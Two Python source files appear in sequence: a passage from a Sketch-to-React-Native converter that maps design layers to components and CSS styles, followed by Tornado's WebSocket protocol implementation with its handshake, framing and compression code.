enabled_borders = [border for border in self.borders if
border.isEnabled]
if enabled_borders:
border = enabled_borders[0]
update_existing(border_styles, border.get_css_border_styles())
dash = self.borderOptions.get_dash_pattern()
if dash and border_styles['borderWidth'] is not None:
if dash[0] > border_styles['borderWidth']:
update_existing(border_styles, {'borderStyle': 'dashed'})
else:
update_existing(border_styles, {'borderStyle': 'dotted'})
return border_styles
class SketchLayer(converters.SketchLayer):
style_class = SketchStyle
frame_class = SketchFrame
component_class = ComponentProperties
def has_fills(self):
return self.style.has_fills()
def get_dimensions(self):
return self.frame.get_css_dimension_styles()
def get_dimensions_width(self):
dimensions = self.get_dimensions()
return {'width': dimensions.get('width', None)}
def get_dimensions_height(self):
dimensions = self.get_dimensions()
return {'height': dimensions.get('height', None)}
def get_text_content(self):
if self.is_text_layer():
content = self.attributedString.get_content() or self.name
else:
content = self.name
if content and type(content) == bytes:
return content.decode('utf-8')
return content
def get_react_component(self, parent=None, pass_styles=None):
if self.component and self.component.get_react_native_component():
component_tag = self.component.get_react_native_component()
if component_tag == "Component":
return Component.create_component(self, parent=parent)
elif component_tag == "Button":
return Button.create_component(self, parent=parent)
elif component_tag == "Image":
return Image.create_component(self, parent=parent)
elif component_tag == "Text":
if self._class == 'MSTextLayer':
return Text.create_component(self, parent=parent)
elif component_tag == "TextInput":
return TextInput.create_component(self, parent=parent)
elif component_tag == "View":
return View.create_component(self, parent=parent)
elif component_tag == "StatusBar":
return StatusBar.create_component(self, parent=parent)
elif component_tag == "ListView":
return ListView.create_component(self, parent=parent)
elif component_tag == "ListViewItem":
return ListViewItem.create_component(self, parent=parent)
elif component_tag == "ListViewItemSeparator":
return Component.create_component(self, parent=parent)
elif component_tag == "Modal":
return Modal.create_component(self, parent=parent)
elif component_tag == "Picker":
return Picker.create_component(self, parent=parent)
elif component_tag == "ProgressBarAndroid":
return ProgressBarAndroid.create_component(self, parent=parent)
elif component_tag == "CustomProgressBar":
return CustomProgressBar.create_component(self, parent=parent)
elif component_tag == "ScrollView":
return ScrollView.create_component(self, parent=parent)
elif component_tag == "Slider":
return Slider.create_component(self, parent=parent)
elif component_tag == "Switch":
return Switch.create_component(self, parent=parent)
elif component_tag == "Touchable":
return Touchable.create_component(self, parent=parent)
elif component_tag == "ToolbarAndroid":
return ToolbarAndroid.create_component(self, parent=parent)
elif component_tag == "Styled Component":
return StyledComponent.create_component(self, parent=parent)
elif component_tag == "SVGImage":
return SvgComponent.create_component(self, parent=parent)
elif component_tag == "PaddingLayer":
return PaddingLayer.create_component(self, parent=parent)
elif component_tag == "MarginLayer":
return MarginLayer.create_component(self, parent=parent)
elif component_tag == "CustomTabBarHeader":
return CustomTabBarHeader.create_component(self, parent=parent)
elif component_tag == "Dummy":
return CustomTabBarHeader.create_component(self, parent=parent)
else:
if (self.is_rectangle_shape() or self.is_oval_shape() or
self.is_shape_group()):
return Empty.create_component(self, parent=parent,
pass_styles=True)
else:
return Empty.create_component(self, parent=parent,
pass_styles=pass_styles)
elif self.is_artboard():
return Component.create_component(self)
elif (self.is_rectangle_shape() or self.is_oval_shape() or
self.is_shape_group()):
return Empty.create_component(self, parent=parent,
pass_styles=True)
else:
return Empty.create_component(self, parent=parent,
pass_styles=pass_styles)
def get_unimplemented_component(self, parent=None):
component = Empty(parent=parent)
component.set_position(self.get_position())
component.update_styles(self.get_css_view_styles())
return component
def get_child_component_layers(self):
components = []
if self.layers:
for layer in self.layers:
component = layer.component.get_react_native_component()
if component:
components.append(layer)
return components
def get_css_text_styles(self):
return combine_styles(self.get_css_view_styles(),
self.style.get_css_text_styles())
def get_css_view_styles(self):
if self.style is not None:
styles = self.style.get_css_view_styles()
# removing fill styles when layer is of MSLayerGroup class
if (self.is_layer_group() or
self.is_text_layer()) and self.style.fills:
for fill in self.style.fills:
remove_existing(styles, fill.get_css_styles())
if not self.is_text_layer():
if self.style.shadows:
for shadow in self.style.shadows:
if shadow.isEnabled:
styles = combine_styles(
styles,
shadow.get_css_shadow_styles()
)
styles = combine_styles(styles, self.style.get_border_styles())
elif self.is_text_layer() and self.style.shadows:
for shadow in self.style.shadows:
if shadow.isEnabled:
styles = combine_styles(
styles,
shadow.get_css_text_shadow_styles()
)
else:
styles = dict()
styles = combine_styles(styles, self.get_css_flex_styles())
styles = combine_styles(styles, self.get_css_border_styles())
# if self.frame is not None:
# styles = combine_styles(styles, self.frame.get_css_styles())
return styles
def get_css_flex_styles(self):
flex_styles = {
'alignItems': None,
'alignSelf': None,
'borderBottomWidth': None,
'borderLeftWidth': None,
'borderRightWidth': None,
'borderTopWidth': None,
'borderWidth': None,
'bottom': None,
'flex': None,
'flexDirection': None,
'flexWrap': None,
'height': None,
'justifyContent': None,
'left': None,
'margin': None,
'marginBottom': None,
'marginHorizontal': None,
'marginLeft': None,
'marginRight': None,
'marginTop': None,
'marginVertical': None,
'maxHeight': None,
'maxWidth': None,
'minHeight': None,
'minWidth': None,
'padding': None,
'paddingBottomStyle': None,
'paddingHorizontal': None,
'paddingLeftStyle': None,
'paddingRightStyle': None,
'paddingTopStyle': None,
'paddingVertical': None,
'position': None,
'right': None,
'top': None,
'width': None,
'zIndex': None,
'flexGrow': None,
'flexShrink': None
}
if self.component and self.component.get_react_native_flex_styles():
update_existing(flex_styles,
self.component.get_react_native_flex_styles())
# If fixed width and height is set on the sketch layer,
# CSS styles corresponding to those will be applied.
update_existing(flex_styles, self.get_css_resizing_constraints())
# elif self.anima is not None:
# update_existing(flex_styles, self.anima.get_css_styles())
if flex_styles.get('position') == 'absolute':
if self.frame is not None:
update_existing(flex_styles, self.get_css_position_styles())
return flex_styles
def get_fill_styles(self):
fill_styles = []
if self.fills:
for fill in self.fills:
fill_styles.append(fill.get_css_styles())
if self.style and self.style.fills:
for fill in self.style.fills:
fill_styles.append(fill.get_css_styles())
return fill_styles
def get_css_resizing_constraints(self):
# These should be used if Sketch DisplayConstraints are used.
# top, height, bottom, left, width, right = 32, 16, 8, 4, 2, 1
# full = 63
constraints = dict()
if self.textBehaviour == 0:
return constraints
if not self.component:
return constraints
native_constraints = \
self.component.get_react_native_resizing_constraints()
fixed_width, fixed_height = native_constraints[:2]
min_width, min_height, max_width, max_height = native_constraints[2:]
dimensions = self.get_dimensions()
width = dimensions['width']
height = dimensions['height']
if fixed_width:
constraints.update({'width': width})
if fixed_height:
constraints.update({'height': height})
if min_width:
constraints.update({'minWidth': width})
if min_height:
constraints.update({'minHeight': height})
if max_width:
constraints.update({'maxWidth': width})
if max_height:
constraints.update({'maxHeight': height})
return constraints
def get_css_position_styles(self):
styles = dict()
if not self.component:
return styles
left, right, top, bottom = \
self.component.get_react_native_absolute_positioning_constraints()
if left:
styles['left'] = self.frame.x
if top:
styles['top'] = self.frame.y
if right:
styles['right'] = (self.parent.frame.width - self.frame.x -
self.frame.width)
if bottom:
styles['bottom'] = (self.parent.frame.height - self.frame.y -
self.frame.height)
return styles
def is_only_child_shape_group(self):
if self.parent is None:
return False
if self.is_shape_group():
for layer in self.parent.layers:
if layer != self and layer.is_shape_group():
return False
return True
return False
|
|
"""Implementation of the WebSocket protocol.
`WebSockets <http://dev.w3.org/html5/websockets/>`_ allow for bidirectional
communication between the browser and server.
WebSockets are supported in the current versions of all major browsers,
although older versions that do not support WebSockets are still in use
(refer to http://caniuse.com/websockets for details).
This module implements the final version of the WebSocket protocol as
defined in `RFC 6455 <http://tools.ietf.org/html/rfc6455>`_. Certain
browser versions (notably Safari 5.x) implemented an earlier draft of
the protocol (known as "draft 76") and are not compatible with this module.
.. versionchanged:: 4.0
Removed support for the draft 76 protocol version.
"""
from __future__ import absolute_import, division, print_function, with_statement
# Author: Jacob Kristhammar, 2010
import base64
import collections
import hashlib
import os
import struct
import tornado.escape
import tornado.web
import zlib
from tornado.concurrent import TracebackFuture
from tornado.escape import utf8, native_str, to_unicode
from tornado import httpclient, httputil
from tornado.ioloop import IOLoop
from tornado.iostream import StreamClosedError
from tornado.log import gen_log, app_log
from tornado import simple_httpclient
from tornado.tcpclient import TCPClient
from tornado.util import _websocket_mask
try:
from urllib.parse import urlparse # py2
except ImportError:
from urlparse import urlparse # py3
try:
xrange # py2
except NameError:
xrange = range # py3
class WebSocketError(Exception):
pass
class WebSocketClosedError(WebSocketError):
"""Raised by operations on a closed connection.
.. versionadded:: 3.2
"""
pass
class WebSocketHandler(tornado.web.RequestHandler):
"""Subclass this class to create a basic WebSocket handler.
Override `on_message` to handle incoming messages, and use
`write_message` to send messages to the client. You can also
override `open` and `on_close` to handle opened and closed
connections.
See http://dev.w3.org/html5/websockets/ for details on the
JavaScript interface. The protocol is specified at
http://tools.ietf.org/html/rfc6455.
Here is an example WebSocket handler that echos back all received messages
back to the client:
.. testcode::
class EchoWebSocket(tornado.websocket.WebSocketHandler):
def open(self):
print("WebSocket opened")
def on_message(self, message):
self.write_message(u"You said: " + message)
def on_close(self):
print("WebSocket closed")
.. testoutput::
:hide:
WebSockets are not standard HTTP connections. The "handshake" is
HTTP, but after the handshake, the protocol is
message-based. Consequently, most of the Tornado HTTP facilities
are not available in handlers of this type. The only communication
methods available to you are `write_message()`, `ping()`, and
`close()`. Likewise, your request handler class should implement
`open()` method rather than ``get()`` or ``post()``.
If you map the handler above to ``/websocket`` in your application, you can
invoke it in JavaScript with::
var ws = new WebSocket("ws://localhost:8888/websocket");
ws.onopen = function() {
ws.send("Hello, world");
};
ws.onmessage = function (evt) {
alert(evt.data);
};
This script pops up an alert box that says "You said: Hello, world".
Web browsers allow any site to open a websocket connection to any other,
instead of using the same-origin policy that governs other network
access from javascript. This can be surprising and is a potential
security hole, so since Tornado 4.0 `WebSocketHandler` requires
applications that wish to receive cross-origin websockets to opt in
by overriding the `~WebSocketHandler.check_origin` method (see that
method's docs for details). Failure to do so is the most likely
cause of 403 errors when making a websocket connection.
When using a secure websocket connection (``wss://``) with a self-signed
certificate, the connection from a browser may fail because it wants
to show the "accept this certificate" dialog but has nowhere to show it.
You must first visit a regular HTML page using the same certificate
to accept it before the websocket connection will succeed.
"""
def __init__(self, application, request, **kwargs):
super(WebSocketHandler, self).__init__(application, request, **kwargs)
self.ws_connection = None
self.close_code = None
self.close_reason = None
self.stream = None
self._on_close_called = False
@tornado.web.asynchronous
def get(self, *args, **kwargs):
self.open_args = args
self.open_kwargs = kwargs
# Upgrade header should be present and should be equal to WebSocket
if self.request.headers.get("Upgrade", "").lower() != 'websocket':
self.set_status(400)
log_msg = "Can \"Upgrade\" only to \"WebSocket\"."
self.finish(log_msg)
gen_log.debug(log_msg)
return
# Connection header should be upgrade.
# Some proxy servers/load balancers
# might mess with it.
headers = self.request.headers
connection = map(lambda s: s.strip().lower(),
headers.get("Connection", "").split(","))
if 'upgrade' not in connection:
self.set_status(400)
log_msg = "\"Connection\" must be \"Upgrade\"."
self.finish(log_msg)
gen_log.debug(log_msg)
return
# Handle WebSocket Origin naming convention differences
# The difference between version 8 and 13 is that in 8 the
# client sends a "Sec-Websocket-Origin" header and in 13 it's
# simply "Origin".
if "Origin" in self.request.headers:
origin = self.request.headers.get("Origin")
else:
origin = self.request.headers.get("Sec-Websocket-Origin", None)
# If there was an origin header, check to make sure it matches
# according to check_origin. When the origin is None, we assume it
# did not come from a browser and that it can be passed on.
if origin is not None and not self.check_origin(origin):
self.set_status(403)
log_msg = "Cross origin websockets not allowed"
self.finish(log_msg)
gen_log.debug(log_msg)
return
self.stream = self.request.connection.detach()
self.stream.set_close_callback(self.on_connection_close)
self.ws_connection = self.get_websocket_protocol()
if self.ws_connection:
self.ws_connection.accept_connection()
else:
if not self.stream.closed():
self.stream.write(tornado.escape.utf8(
"HTTP/1.1 426 Upgrade Required\r\n"
"Sec-WebSocket-Version: 7, 8, 13\r\n\r\n"))
self.stream.close()
def write_message(self, message, binary=False):
"""Sends the given message to the client of this Web Socket.
The message may be either a string or a dict (which will be
encoded as json). If the ``binary`` argument is false, the
message will be sent as utf8; in binary mode any byte string
is allowed.
If the connection is already closed, raises `WebSocketClosedError`.
.. versionchanged:: 3.2
`WebSocketClosedError` was added (previously a closed connection
would raise an `AttributeError`)
.. versionchanged:: 4.3
Returns a `.Future` which can be used for flow control.
"""
if self.ws_connection is None:
raise WebSocketClosedError()
if isinstance(message, dict):
message = tornado.escape.json_encode(message)
return self.ws_connection.write_message(message, binary=binary)
def select_subprotocol(self, subprotocols):
"""Invoked when a new WebSocket requests specific subprotocols.
``subprotocols`` is a list of strings identifying the
subprotocols proposed by the client. This method may be
overridden to return one of those strings to select it, or
``None`` to not select a subprotocol. Failure to select a
subprotocol does not automatically abort the connection,
although clients may close the connection if none of their
proposed subprotocols was selected.
"""
return None
def get_compression_options(self):
"""Override to return compression options for the connection.
If this method returns None (the default), compression will
be disabled. If it returns a dict (even an empty one), it
will be enabled. The contents of the dict may be used to
control the memory and CPU usage of the compression,
but no such options are currently implemented.
.. versionadded:: 4.1
"""
return None
def open(self, *args, **kwargs):
"""Invoked when a new WebSocket is opened.
The arguments to `open` are extracted from the `tornado.web.URLSpec`
regular expression, just like the arguments to
`tornado.web.RequestHandler.get`.
"""
pass
def on_message(self, message):
"""Handle incoming messages on the WebSocket
This method must be overridden.
"""
raise NotImplementedError
def ping(self, data):
"""Send ping frame to the remote end."""
if self.ws_connection is None:
raise WebSocketClosedError()
self.ws_connection.write_ping(data)
def on_pong(self, data):
"""Invoked when the response to a ping frame is received."""
pass
def on_close(self):
"""Invoked when the WebSocket is closed.
If the connection was closed cleanly and a status code or reason
phrase was supplied, these values will be available as the attributes
``self.close_code`` and ``self.close_reason``.
.. versionchanged:: 4.0
Added ``close_code`` and ``close_reason`` attributes.
"""
pass
def close(self, code=None, reason=None):
"""Closes this Web Socket.
Once the close handshake is successful the socket will be closed.
``code`` may be a numeric status code, taken from the values
defined in `RFC 6455 section 7.4.1
<https://tools.ietf.org/html/rfc6455#section-7.4.1>`_.
``reason`` may be a textual message about why the connection is
closing. These values are made available to the client, but are
not otherwise interpreted by the websocket protocol.
.. versionchanged:: 4.0
Added the ``code`` and ``reason`` arguments.
"""
if self.ws_connection:
self.ws_connection.close(code, reason)
self.ws_connection = None
def check_origin(self, origin):
"""Override to enable support for allowing alternate origins.
The ``origin`` argument is the value of the ``Origin`` HTTP
header, the url responsible for initiating this request. This
method is not called for clients that do not send this header;
such requests are always allowed (because all browsers that
implement WebSockets support this header, and non-browser
clients do not have the same cross-site security concerns).
Should return True to accept the request or False to reject it.
By default, rejects all requests with an origin on a host other
than this one.
This is a security protection against cross site scripting attacks on
browsers, since WebSockets are allowed to bypass the usual same-origin
policies and don't use CORS headers.
To accept all cross-origin traffic (which was the default prior to
Tornado 4.0), simply override this method to always return true::
def check_origin(self, origin):
return True
To allow connections from any subdomain of your site, you might
do something like::
def check_origin(self, origin):
parsed_origin = urllib.parse.urlparse(origin)
return parsed_origin.netloc.endswith(".mydomain.com")
.. versionadded:: 4.0
"""
parsed_origin = urlparse(origin)
origin = parsed_origin.netloc
origin = origin.lower()
host = self.request.headers.get("Host")
# Check to see that origin matches host directly, including ports
return origin == host
def set_nodelay(self, value):
"""Set the no-delay flag for this stream.
By default, small messages may be delayed and/or combined to minimize
the number of packets sent. This can sometimes cause 200-500ms delays
due to the interaction between Nagle's algorithm and TCP delayed
ACKs. To reduce this delay (at the expense of possibly increasing
bandwidth usage), call ``self.set_nodelay(True)`` once the websocket
connection is established.
See `.BaseIOStream.set_nodelay` for additional details.
.. versionadded:: 3.1
"""
self.stream.set_nodelay(value)
def on_connection_close(self):
if self.ws_connection:
self.ws_connection.on_connection_close()
self.ws_connection = None
if not self._on_close_called:
self._on_close_called = True
self.on_close()
def send_error(self, *args, **kwargs):
if self.stream is None:
super(WebSocketHandler, self).send_error(*args, **kwargs)
else:
# If we get an uncaught exception during the handshake,
# we have no choice but to abruptly close the connection.
# TODO: for uncaught exceptions after the handshake,
# we can close the connection more gracefully.
self.stream.close()
def get_websocket_protocol(self):
websocket_version = self.request.headers.get("Sec-WebSocket-Version")
if websocket_version in ("7", "8", "13"):
return WebSocketProtocol13(
self, compression_options=self.get_compression_options())
def _wrap_method(method):
def _disallow_for_websocket(self, *args, **kwargs):
if self.stream is None:
method(self, *args, **kwargs)
else:
raise RuntimeError("Method not supported for Web Sockets")
return _disallow_for_websocket
for method in ["write", "redirect", "set_header", "set_cookie",
"set_status", "flush", "finish"]:
setattr(WebSocketHandler, method,
_wrap_method(getattr(WebSocketHandler, method)))
class WebSocketProtocol(object):
"""Base class for WebSocket protocol versions.
"""
def __init__(self, handler):
self.handler = handler
self.request = handler.request
self.stream = handler.stream
self.client_terminated = False
self.server_terminated = False
def _run_callback(self, callback, *args, **kwargs):
"""Runs the given callback with exception handling.
On error, aborts the websocket connection and returns False.
"""
try:
callback(*args, **kwargs)
except Exception:
app_log.error("Uncaught exception in %s",
self.request.path, exc_info=True)
self._abort()
def on_connection_close(self):
self._abort()
def _abort(self):
"""Instantly aborts the WebSocket connection by closing the socket"""
self.client_terminated = True
self.server_terminated = True
self.stream.close() # forcibly tear down the connection
self.close() # let the subclass cleanup
class _PerMessageDeflateCompressor(object):
def __init__(self, persistent, max_wbits):
if max_wbits is None:
max_wbits = zlib.MAX_WBITS
# There is no symbolic constant for the minimum wbits value.
if not (8 <= max_wbits <= zlib.MAX_WBITS):
raise ValueError("Invalid max_wbits value %r; allowed range 8-%d",
max_wbits, zlib.MAX_WBITS)
self._max_wbits = max_wbits
if persistent:
self._compressor = self._create_compressor()
else:
self._compressor = None
def _create_compressor(self):
return zlib.compressobj(tornado.web.GZipContentEncoding.GZIP_LEVEL,
zlib.DEFLATED, -self._max_wbits)
def compress(self, data):
compressor = self._compressor or self._create_compressor()
data = (compressor.compress(data) +
compressor.flush(zlib.Z_SYNC_FLUSH))
assert data.endswith(b'\x00\x00\xff\xff')
return data[:-4]
class _PerMessageDeflateDecompressor(object):
def __init__(self, persistent, max_wbits):
if max_wbits is None:
max_wbits = zlib.MAX_WBITS
if not (8 <= max_wbits <= zlib.MAX_WBITS):
raise ValueError("Invalid max_wbits value %r; allowed range 8-%d",
max_wbits, zlib.MAX_WBITS)
self._max_wbits = max_wbits
if persistent:
self._decompressor = self._create_decompressor()
else:
self._decompressor = None
def _create_decompressor(self):
return zlib.decompressobj(-self._max_wbits)
def decompress(self, data):
decompressor = self._decompressor or self._create_decompressor()
return decompressor.decompress(data + b'\x00\x00\xff\xff')
class WebSocketProtocol13(WebSocketProtocol):
"""Implementation of the WebSocket protocol from RFC 6455.
This class supports versions 7 and 8 of the protocol in addition to the
final version 13.
"""
# Bit masks for the first byte of a frame.
FIN = 0x80
RSV1 = 0x40
RSV2 = 0x20
RSV3 = 0x10
RSV_MASK = RSV1 | RSV2 | RSV3
OPCODE_MASK = 0x0f
def __init__(self, handler, mask_outgoing=False,
compression_options=None):
WebSocketProtocol.__init__(self, handler)
self.mask_outgoing = mask_outgoing
self._final_frame = False
self._frame_opcode = None
self._masked_frame = None
self._frame_mask = None
self._frame_length = None
self._fragmented_message_buffer = None
self._fragmented_message_opcode = None
self._waiting = None
self._compression_options = compression_options
self._decompressor = None
self._compressor = None
self._frame_compressed = None
# The total uncompressed size of all messages received or sent.
# Unicode messages are encoded to utf8.
# Only for testing; subject to change.
self._message_bytes_in = 0
self._message_bytes_out = 0
# The total size of all packets received or sent. Includes
# the effect of compression, frame overhead, and control frames.
self._wire_bytes_in = 0
self._wire_bytes_out = 0
def accept_connection(self):
try:
self._handle_websocket_headers()
self._accept_connection()
except ValueError:
gen_log.debug("Malformed WebSocket request received",
exc_info=True)
self._abort()
return
def _handle_websocket_headers(self):
"""Verifies all invariant- and required headers
If a header is missing or have an incorrect value ValueError will be
raised
"""
fields = ("Host", "Sec-Websocket-Key", "Sec-Websocket-Version")
if not all(map(lambda f: self.request.headers.get(f), fields)):
raise ValueError("Missing/Invalid WebSocket headers")
@staticmethod
def compute_accept_value(key):
"""Computes the value for the Sec-WebSocket-Accept header,
given the value for Sec-WebSocket-Key.
"""
sha1 = hashlib.sha1()
sha1.update(utf8(key))
sha1.update(b"258EAFA5-E914-47DA-95CA-C5AB0DC85B11") # Magic value
return native_str(base64.b64encode(sha1.digest()))
def _challenge_response(self):
return WebSocketProtocol13.compute_accept_value(
self.request.headers.get("Sec-Websocket-Key"))
def _accept_connection(self):
subprotocol_header = ''
subprotocols = self.request.headers.get("Sec-WebSocket-Protocol", '')
subprotocols = [s.strip() for s in subprotocols.split(',')]
if subprotocols:
selected = self.handler.select_subprotocol(subprotocols)
if selected:
assert selected in subprotocols
subprotocol_header = ("Sec-WebSocket-Protocol: %s\r\n"
% selected)
extension_header = ''
extensions = self._parse_extensions_header(self.request.headers)
for ext in extensions:
if (ext[0] == 'permessage-deflate' and
self._compression_options is not None):
# TODO: negotiate parameters if compression_options
# specifies limits.
self._create_compressors('server', ext[1])
if ('client_max_window_bits' in ext[1] and
ext[1]['client_max_window_bits'] is None):
# Don't echo an offered client_max_window_bits
# parameter with no value.
del ext[1]['client_max_window_bits']
extension_header = ('Sec-WebSocket-Extensions: %s\r\n' %
httputil._encode_header(
'permessage-deflate', ext[1]))
break
if self.stream.closed():
self._abort()
return
self.stream.write(tornado.escape.utf8(
"HTTP/1.1 101 Switching Protocols\r\n"
"Upgrade: websocket\r\n"
"Connection: Upgrade\r\n"
"Sec-WebSocket-Accept: %s\r\n"
"%s%s"
"\r\n" % (self._challenge_response(),
subprotocol_header, extension_header)))
self._run_callback(self.handler.open, *self.handler.open_args,
**self.handler.open_kwargs)
self._receive_frame()
def _parse_extensions_header(self, headers):
extensions = headers.get("Sec-WebSocket-Extensions", '')
if extensions:
return [httputil._parse_header(e.strip())
for e in extensions.split(',')]
return []
def _process_server_headers(self, key, headers):
"""Process the headers sent by the server to this client connection.
'key' is the websocket handshake challenge/response key.
"""
assert headers['Upgrade'].lower() == 'websocket'
assert headers['Connection'].lower() == 'upgrade'
accept = self.compute_accept_value(key)
assert headers['Sec-Websocket-Accept'] == accept
extensions = self._parse_extensions_header(headers)
for ext in extensions:
if (ext[0] == 'permessage-deflate' and
self._compression_options is not None):
self._create_compressors('client', ext[1])
else:
raise ValueError("unsupported extension %r", ext)
def _get_compressor_options(self, side, agreed_parameters):
"""Converts a websocket agreed_parameters set to keyword arguments
for our compressor objects.
"""
options = dict(
persistent=(side + '_no_context_takeover') not in agreed_parameters)
wbits_header = agreed_parameters.get(side + '_max_window_bits', None)
if wbits_header is None:
options['max_wbits'] = zlib.MAX_WBITS
else:
options['max_wbits'] = int(wbits_header)
return options
def _create_compressors(self, side, agreed_parameters):
# TODO: handle invalid parameters gracefully
allowed_keys = set(['server_no_context_takeover',
'client_no_context_takeover',
'server_max_window_bits',
'client_max_window_bits'])
for key in agreed_parameters:
if key not in allowed_keys:
raise ValueError("unsupported compression parameter %r" % key)
other_side = 'client' if (side == 'server') else 'server'
self._compressor = _PerMessageDeflateCompressor(
**self._get_compressor_options(side, agreed_parameters))
self._decompressor = _PerMessageDeflateDecompressor(
**self._get_compressor_options(other_side, agreed_parameters))
def _write_frame(self, fin, opcode, data, flags=0):
if fin:
finbit = self.FIN
else:
finbit = 0
frame = struct.pack("B", finbit | opcode | flags)
l = len(data)
if self.mask_outgoing:
mask_bit = 0x80
else:
mask_bit = 0
if l < 126:
frame += struct.pack("B", l | mask_bit)
elif l <= 0xFFFF:
frame += struct.pack("!BH", 126 | mask_bit, l)
else:
frame += struct.pack("!BQ", 127 | mask_bit, l)
if self.mask_outgoing:
mask = os.urandom(4)
data = mask + _websocket_mask(mask, data)
frame += data
self._wire_bytes_out += len(frame)
try:
return self.stream.write(frame)
except StreamClosedError:
self._abort()
def write_message(self, message, binary=False):
"""Sends the given message to the client of this Web Socket."""
if binary:
opcode = 0x2
else:
opcode = 0x1
message = tornado.escape.utf8(message)
assert isinstance(message, bytes)
self._message_bytes_out += len(message)
flags = 0
if self._compressor:
message = self._compressor.compress(message)
flags |= self.RSV1
return self._write_frame(True, opcode, message, flags=flags)
def write_ping(self, data):
"""Send ping frame."""
assert isinstance(data, bytes)
self._write_frame(True, 0x9, data)
def _receive_frame(self):
try:
self.stream.read_bytes(2, self._on_frame_start)
except StreamClosedError:
self._abort()
def _on_frame_start(self, data):
self._wire_bytes_in += len(data)
header, payloadlen = struct.unpack("BB", data)
self._final_frame = header & self.FIN
reserved_bits = header & self.RSV_MASK
self._frame_opcode = header & self.OPCODE_MASK
self._frame_opcode_is_control = self._frame_opcode & 0x8
if self._decompressor is not None and self._frame_opcode != 0:
self._frame_compressed = bool(reserved_bits & self.RSV1)
reserved_bits &= ~self.RSV1
if reserved_bits:
# client is using as-yet-undefined extensions; abort
self._abort()
return
self._masked_frame = bool(payloadlen & 0x80)
payloadlen = payloadlen & 0x7f
if self._frame_opcode_is_control and payloadlen >= 126:
# control frames must have payload < 126
self._abort()
return
try:
if payloadlen < 126:
self._frame_length = payloadlen
if self._masked_frame:
self.stream.read_bytes(4, self._on_masking_key)
else:
self.stream.read_bytes(self._frame_length,
self._on_frame_data)
elif payloadlen == 126:
self.stream.read_bytes(2, self._on_frame_length_16)
elif payloadlen == 127:
self.stream.read_bytes(8, self._on_frame_length_64)
except StreamClosedError:
self._abort()
def _on_frame_length_16(self, data):
self._wire_bytes_in += len(data)
self._frame_length = struct.unpack("!H", data)[0]
try:
if self._masked_frame:
self.stream.read_bytes(4, self._on_masking_key)
else:
self.stream.read_bytes(self._frame_length, self._on_frame_data)
except StreamClosedError:
self._abort()
def _on_frame_length_64(self, data):
self._wire_bytes_in += len(data)
self._frame_length = struct.unpack("!Q", data)[0]
try:
if self._masked_frame:
self.stream.read_bytes(4, self._on_masking_key)
else:
self.stream.read_bytes(self._frame_length, self._on_frame_data)
except StreamClosedError:
self._abort()
def _on_masking_key(self, data):
self._wire_bytes_in += len(data)
self._frame_mask = data
try:
self.stream.read_bytes(self._frame_length,
self._on_masked_frame_data)
except StreamClosedError:
self._abort()
def _on_masked_frame_data(self, data):
# Don't touch _wire_bytes_in; we'll do it in _on_frame_data.
self._on_frame_data(_websocket_mask(self._frame_mask, data))
def _on_frame_data(self, data):
self._wire_bytes_in += len(data)
if self._frame_opcode_is_control:
# control frames may be interleaved with a series of fragmented
# data frames, so control frames must not interact with
# self._fragmented_*
if not self._final_frame:
# control frames must not be fragmented
self._abort()
return
opcode = self._frame_opcode
elif self._frame_opcode == 0: # continuation frame
if self._fragmented_message_buffer is None:
# nothing to continue
self._abort()
return
self._fragmented_message_buffer += data
if self._final_frame:
opcode = self._fragmented_message_opcode
data = self._fragmented_message_buffer
self._fragmented_message_buffer = None
else: # start of new data message
if self._fragmented_message_buffer is not None:
# can't start new message until the old one is finished
self._abort()
return
if self._final_frame:
opcode = self._frame_opcode
else:
self._fragmented_message_opcode = self._frame_opcode
self._fragmented_message_buffer = data
if self._final_frame:
self._handle_message(opcode, data)
if not self.client_terminated:
self._receive_frame()
def _handle_message(self, opcode, data):
if self.client_terminated:
return
if self._frame_compressed:
data = self._decompressor.decompress(data)
if opcode == 0x1:
# UTF-8 data
self._message_bytes_in += len(data)
try:
decoded = data.decode("utf-8")
except UnicodeDecodeError:
self._abort()
return
self._run_callback(self.handler.on_message, decoded)
elif opcode == 0x2:
# Binary data
self._message_bytes_in += len(data)
self._run_callback(self.handler.on_message, data)
elif opcode == 0x8:
# Close
self.client_terminated = True
if len(data) >= 2:
self.handler.close_code = struct.unpack('>H', data[:2])[0]
if len(data) > 2:
self.handler.close_reason = to_unicode(data[2:])
# Echo the received close code, if any (RFC 6455 section 5.5.1).
self.close(self.handler.close_code)
elif opcode == 0x9:
# Ping
self._write_frame(True, 0xA, data)
elif opcode == 0xA:
# Pong
self._run_callback(self.handler.on_pong, data)
else:
self._abort()
def close(self, code=None, reason=None):
"""Closes the WebSocket connection."""
if not self.server_terminated:
if not self.stream.closed():
if code is None and reason is not None:
code = 1000 # "normal closure" status code
if code is None:
close_data = b''
else:
close_data = struct.pack('>H', code)
if reason is not None:
close_data += utf8(reason)
self._write_frame(True, 0x8, close_data)
self.server_terminated = True
if self.client_terminated:
if self._waiting is not None:
self.stream.io_loop.remove_timeout(self._waiting)
self._waiting = None
self.stream.close()
elif self._waiting is None:
# Give the client a few seconds to complete a clean shutdown,
# otherwise just close the connection.
self._waiting = self.stream.io_loop.add_timeout(
self.stream.io_loop.time() + 5, self._abort)
class WebSocketClientConnection(simple_httpclient._HTTPConnection):
"""WebSocket client connection.
This class should not be instantiated directly; use the
`websocket_connect` function instead.
"""
def __init__(self, io_loop, request, on_message_callback=None,
compression_options=None):
self.compression_options = compression_options
self.connect_future = TracebackFuture()
self.protocol = None
self.read_future = None
self.read_queue = collections.deque()
self.key = base64.b64encode(os.urandom(16))
self._on_message_callback = on_message_callback
self.close_code = self.close_reason = None
scheme, sep, rest = request.url.partition(':')
scheme = {'ws': 'http', 'wss': 'https'}[scheme]
request.url = scheme + sep + rest
request.headers.update({
'Upgrade': 'websocket',
'Connection': 'Upgrade',
'Sec-WebSocket-Key': self.key,
'Sec-WebSocket-Version': '13',
})
if self.compression_options is not None:
# Always offer to let the server set our max_wbits (and even though
# we don't offer it, we will accept a client_no_context_takeover
# from the server).
# TODO: set server parameters for deflate extension
# if requested in self.compression_options.
request.headers['Sec-WebSocket-Extensions'] = (
'permessage-deflate; client_max_window_bits')
self.tcp_client = TCPClient(io_loop=io_loop)
super(WebSocketClientConnection, self).__init__(
io_loop, None, request, lambda: None, self._on_http_response,
104857600, self.tcp_client, 65536, 104857600)
def close(self, code=None, reason=None):
"""Closes the websocket connection.
``code`` and ``reason`` are documented under
`WebSocketHandler.close`.
.. versionadded:: 3.2
.. versionchanged:: 4.0
Added the ``code`` and ``reason`` arguments.
"""
if self.protocol is not None:
self.protocol.close(code, reason)
